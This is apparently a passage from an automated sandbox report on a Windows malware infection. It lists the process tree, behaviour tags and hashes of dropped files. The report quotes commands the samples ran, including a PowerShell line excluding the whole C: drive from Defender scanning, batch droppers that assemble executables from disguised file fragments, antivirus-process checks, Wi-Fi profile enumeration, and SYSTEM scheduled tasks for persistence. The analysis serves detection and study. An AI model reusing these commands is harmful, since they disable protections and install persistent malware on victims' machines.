                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4412 -prefsLen 34775 -prefMapHandle 4416 -prefMapSize 270279 -jsInitHandle 4420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3108 -initialChannelId {f72fc136-a40f-42d2-8a30-eac9f7e17185} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:3568
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5028 -prefsLen 35012 -prefMapHandle 5032 -prefMapSize 270279 -ipcHandle 5040 -initialChannelId {682d8e92-2999-4569-ae73-468248d2d4ff} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:4764
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5252 -prefsLen 32952 -prefMapHandle 5248 -prefMapSize 270279 -jsInitHandle 5244 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5316 -initialChannelId {a654aca5-664a-49b9-986d-bbcc867d3009} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:3292
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3412 -prefsLen 32952 -prefMapHandle 5244 -prefMapSize 270279 -jsInitHandle 5248 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3420 -initialChannelId {6775e821-50a9-4b14-85c9-f60fce5abf78} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:956
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5720 -prefsLen 32952 -prefMapHandle 5724 -prefMapSize 270279 -jsInitHandle 5728 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5736 -initialChannelId {b9e0bc98-6f98-458e-924a-349738c71c91} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:1812
                                                          • C:\Users\Admin\AppData\Local\Temp\10445010101\c390a85ab1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10445010101\c390a85ab1.exe"
                                                            6⤵
                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            • Modifies Windows Defender TamperProtection settings
                                                            • Modifies Windows Defender notification settings
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Windows security modification
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:404
                                                          • C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2800
                                                          • C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3216
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3784
                                                          • C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe"
                                                            6⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3252
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3008
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4536
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /I "opssvc wrsa"
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5304
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3748
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                8⤵
                                                                  PID:1596
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c md 689912
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5108
                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                  extrac32 /Y /E Exclusion.psd
                                                                  8⤵
                                                                    PID:4348
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /V "users" Findarticles
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3028
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5528
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:6032
                                                                  • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                                                                    Jordan.com b
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:5456
                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                    choice /d y /t 5
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4688
                                                              • C:\Users\Admin\AppData\Local\Temp\10445050101\Yhihb8G.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10445050101\Yhihb8G.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Accesses Microsoft Outlook profiles
                                                                • System Location Discovery: System Language Discovery
                                                                • Checks processor information in registry
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • outlook_office_path
                                                                • outlook_win_path
                                                                PID:5748
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                  7⤵
                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                  PID:1980
                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                    chcp 65001
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1620
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh wlan show profile
                                                                    8⤵
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                    PID:1472
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr All
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5644
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 2528
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4100
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6108
                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                    chcp 65001
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1344
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh wlan show networks mode=bssid
                                                                    8⤵
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4736
                                                              • C:\Users\Admin\AppData\Local\Temp\10445060101\9sWdA2p.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10445060101\9sWdA2p.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2492
                                                              • C:\Users\Admin\AppData\Local\Temp\10445070101\TbV75ZR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10445070101\TbV75ZR.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4784
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4448
                                                              • C:\Users\Admin\AppData\Local\Temp\10445080101\7IIl2eE.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10445080101\7IIl2eE.exe"
                                                                6⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Drops file in Windows directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5836
                                                                • C:\Windows\SysWOW64\CMD.exe
                                                                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1784
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist
                                                                    8⤵
                                                                    • Enumerates processes with tasklist
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5516
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /I "opssvc wrsa"
                                                                    8⤵
                                                                      PID:2112
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist
                                                                      8⤵
                                                                      • Enumerates processes with tasklist
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1012
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5524
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c md 418377
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:440
                                                                    • C:\Windows\SysWOW64\extrac32.exe
                                                                      extrac32 /Y /E Leon.cab
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2800
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V "BEVERAGES" Compilation
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4308
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5496
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4656
                                                                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                      Passwords.com N
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:4788
                                                                    • C:\Windows\SysWOW64\choice.exe
                                                                      choice /d y /t 5
                                                                      8⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4492
                                                                • C:\Users\Admin\AppData\Local\Temp\10445090101\UZPt0hR.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10445090101\UZPt0hR.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:4624
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                    7⤵
                                                                      PID:4252
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                        8⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3768
                                                                    • C:\Windows\system32\svchost.exe
                                                                      "C:\Windows\system32\svchost.exe"
                                                                      7⤵
                                                                      • Downloads MZ/PE file
                                                                      • Adds Run key to start application
                                                                      PID:4900
                                                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5768
                                                                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                        8⤵
                                                                        • Deletes itself
                                                                        • Executes dropped EXE
                                                                        PID:3256
                                                                  • C:\Users\Admin\AppData\Local\Temp\10445100101\ee9ac1adbe.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10445100101\ee9ac1adbe.exe"
                                                                    6⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Writes to the Master Boot Record (MBR)
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5744
                                                                  • C:\Users\Admin\AppData\Local\Temp\10445110101\1e9b491d42.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10445110101\1e9b491d42.exe"
                                                                    6⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:13216
                                                                  • C:\Users\Admin\AppData\Local\Temp\10445120101\Rm3cVPI.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10445120101\Rm3cVPI.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4180
                                                                  • C:\Users\Admin\AppData\Local\Temp\10445130101\i4cwegu.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10445130101\i4cwegu.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:740
                                                                  • C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe"
                                                                    6⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5648
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
                                                                      7⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:3284
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
                                                                      7⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:5716
                                                                    • C:\Drivers\pcidrv.exe
                                                                      C:\Drivers\pcidrv.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:3736
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10445140101\but2.exe
                                                                      7⤵
                                                                        PID:5156
                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                          timeout /t 2
                                                                          8⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Delays execution with timeout.exe
                                                                          PID:6184
                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            1⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4704
                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                            1⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2352
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5748 -ip 5748
                                                            1⤵
                                                              PID:3488
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                              1⤵
                                                                PID:1012
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                1⤵
                                                                  PID:1444
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:1720

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  25604a2821749d30ca35877a7669dff9

                                                                  SHA1

                                                                  49c624275363c7b6768452db6868f8100aa967be

                                                                  SHA256

                                                                  7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                  SHA512

                                                                  206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8RDJB14J\service[1].htm

                                                                  Filesize

                                                                  1B

                                                                  MD5

                                                                  cfcd208495d565ef66e7dff9f98764da

                                                                  SHA1

                                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                  SHA256

                                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                  SHA512

                                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ONPDW741\soft[1]

                                                                  Filesize

                                                                  3.0MB

                                                                  MD5

                                                                  91f372706c6f741476ee0dac49693596

                                                                  SHA1

                                                                  8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                  SHA256

                                                                  9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                  SHA512

                                                                  88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Filesize

                                                                  16KB

                                                                  MD5

                                                                  e085965af7b7369150d0b72a8f7c0042

                                                                  SHA1

                                                                  b6e7537fc54dfbc1c5f5dc77f06019e4b65f4a72

                                                                  SHA256

                                                                  717b744f989d5f83dea2d664409042a539f6d401e571b06c3dff8e755fbffa9a

                                                                  SHA512

                                                                  ced79235e0926cebe4a9d8c48f4e45c3598762bfe28f3da594c26d9f8c4e12733b1ce784269f8be6921a70e404b6a16c3bdc5fddaacf68067726a090a77266d2

                                                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ahkgvp67.default-release\activity-stream.discovery_stream.json.tmp

                                                                  Filesize

                                                                  25KB

                                                                  MD5

                                                                  6fced82945e1e04053215ebf1e402466

                                                                  SHA1

                                                                  6af8843a6108167c9c9fd0743c40692da076af40

                                                                  SHA256

                                                                  bfadfcaeb58be45b0efb695d7a7b17d04d7bd2d99f4c896ec3608a52fdc9d6e6

                                                                  SHA512

                                                                  4181b1b1fd1eaa0233aaba22750ee1df9b462abe830c61797985fba933209acc75692bf4f0818ba31c7bc5704a71b721e74c9601c0f93e8a758ea55bbb036bb7

                                                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ahkgvp67.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                  Filesize

                                                                  13KB

                                                                  MD5

                                                                  e31e8cebef450c3a2ca6aae43651b084

                                                                  SHA1

                                                                  ceeb02cf59f6f70e0e730ae67851a698ceff78bd

                                                                  SHA256

                                                                  62886913cd0d7b4b3d53f5165f9c4adc2589b4f09f1794f094b2a7e8d7cab03a

                                                                  SHA512

                                                                  469219fd9d4b86ee41f714489ecaeff6e7dafab45717b26a6ce77b2095cbd0f0a1450f8fccfcf91fe5b43d2deb7cc27385e3c6502d2ab24c0a9eadd0a245277d

                                                                • C:\Users\Admin\AppData\Local\Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE

                                                                  Filesize

                                                                  1.8MB

                                                                  MD5

                                                                  a616c70b521871a888c297266c93e4dc

                                                                  SHA1

                                                                  9c155bfcc1f54ad43feea0a5c03fc9d1b6529b7a

                                                                  SHA256

                                                                  788c57b940278eb945aec7589626e9282741922a6bf31769ab5beb4427a83eff

                                                                  SHA512

                                                                  9be0945d78d314e96e3b0d62ebe448e14650a9620bc9ba70df9c4d359f1302abcf28a1d553515bbfbc9f147041161a75b99742765cf7776f19a69ecd6989b662

                                                                • C:\Users\Admin\AppData\Local\Temp\10444930101\36c97fadf5.exe

                                                                  Filesize

                                                                  938KB

                                                                  MD5

                                                                  a798a2631ae2bc2f61b80ce937c75c65

                                                                  SHA1

                                                                  f718fd2971eb1c17f0c1b7940c00e2e8ff18bcc2

                                                                  SHA256

                                                                  3d3acb05b2a067b5bd9f7561320c2a61a23344c8f3cb78ac429b4e22b9f955b6

                                                                  SHA512

                                                                  2d55ef28fe438b20f1a7122ecd8002ce4e7e57006eebec290693b4be923c11ea82b58c90b9028cb103af4e2f15617e1b6a3dca7d6abce501f96121d7eb920daf

                                                                • C:\Users\Admin\AppData\Local\Temp\10444940101\ddff17fe91.exe

                                                                  Filesize

                                                                  1.8MB

                                                                  MD5

                                                                  15c8b2c9850ae1e61fefc93fa7d68420

                                                                  SHA1

                                                                  c5ae1454178293c4b26934572a8189bc5bb19798

                                                                  SHA256

                                                                  835795ba6a18c56ddc56f0fad120d0a6f4ce47a55f8b9f29c59692e3965285f0

                                                                  SHA512

                                                                  faaaf9dd1a9bdf77e76c6faa3d305d071289e280922b37ec6742c21642a05edf15cfb57663319e425755a62793446944b6b16c5eb1328c1567d5bad4fa0579e4

                                                                • C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe

                                                                  Filesize

                                                                  327KB

                                                                  MD5

                                                                  17b045d3037b19362f5710ef08a1c3a9

                                                                  SHA1

                                                                  b510e63483354299a982f8c8b8425e1611f60ad4

                                                                  SHA256

                                                                  ca1cf8c31abcbf6fa6d324098c97bea8452da24cfcf579a52a3d262c93a85557

                                                                  SHA512

                                                                  cd96011398083f83d0869df41acf62cc8ccb69ea92b5c83066098f4227aa60bf37af16c4b5118cb5497202c8f78ab4703c9d8acf61ca41f3512d882dd5f79ac0

                                                                • C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe

                                                                  Filesize

                                                                  5.9MB

                                                                  MD5

                                                                  e05432c13d42b8526ce4bc0dc240d297

                                                                  SHA1

                                                                  db6e9382425055030662ecdc95d6405d30dcf82a

                                                                  SHA256

                                                                  574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

                                                                  SHA512

                                                                  56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

                                                                • C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe

                                                                  Filesize

                                                                  4.3MB

                                                                  MD5

                                                                  1fb7beea8967c3ce15e72e9a8d14dc28

                                                                  SHA1

                                                                  e2354deb9e8e84f7915bbad85fc934df8330557c

                                                                  SHA256

                                                                  56208f729c6b9895dd87a0f120972a8b48320b247b4f668f6ef9f483044d3e48

                                                                  SHA512

                                                                  6ba0db71de31f8ce3ee1cf84581015ac3bfc7fd898121214f92ba14b0f2b3bf75e11e9941c6d83f71364399af6be6159f141e78bde6b4f42036020842ff32381

                                                                • C:\Users\Admin\AppData\Local\Temp\10444980101\72551f9bea.exe

                                                                  Filesize

                                                                  2.0MB

                                                                  MD5

                                                                  b39a7b7abb38128cd84111b9a2280354

                                                                  SHA1

                                                                  095b410f4b36160fb4e25782b9694dc59ddad189

                                                                  SHA256

                                                                  ddad9307f926eb50a91c42779e54a27b21647c8b0dcc339c8878f78782d39dab

                                                                  SHA512

                                                                  f45b4338b2c7e0c8f13585cb812cc55f85534119142f0f9b1ba5940cbfa35637f3ddd9d519c7c3a00c0953ce3762fc746ff161c768f5503db32764eb0a076714

                                                                • C:\Users\Admin\AppData\Local\Temp\10444990101\a594ddf458.exe

                                                                  Filesize

                                                                  2.4MB

                                                                  MD5

                                                                  8d447e61f59a5c962647d5bb5303c0bd

                                                                  SHA1

                                                                  7dddcc5fcd5aefa6ef1471bc17949723ca2451d5

                                                                  SHA256

                                                                  958e2e8a5ea6582e391eede86070eaeb90bb0e98dac05d45ccb8b0f440a8ee75

                                                                  SHA512

                                                                  b89d53508c19ed22785b3582de3b889acbd4cbfdb8289cad8b840bc53c4e0eb897ee4f0e9c50384ede2b29df343a4a49264567843188417bef81e4049d708719

                                                                • C:\Users\Admin\AppData\Local\Temp\10445000101\43f9a4e9b0.exe

                                                                  Filesize

                                                                  947KB

                                                                  MD5

                                                                  2ebbf3ae59011c5cf6dbee768e7da3ee

                                                                  SHA1

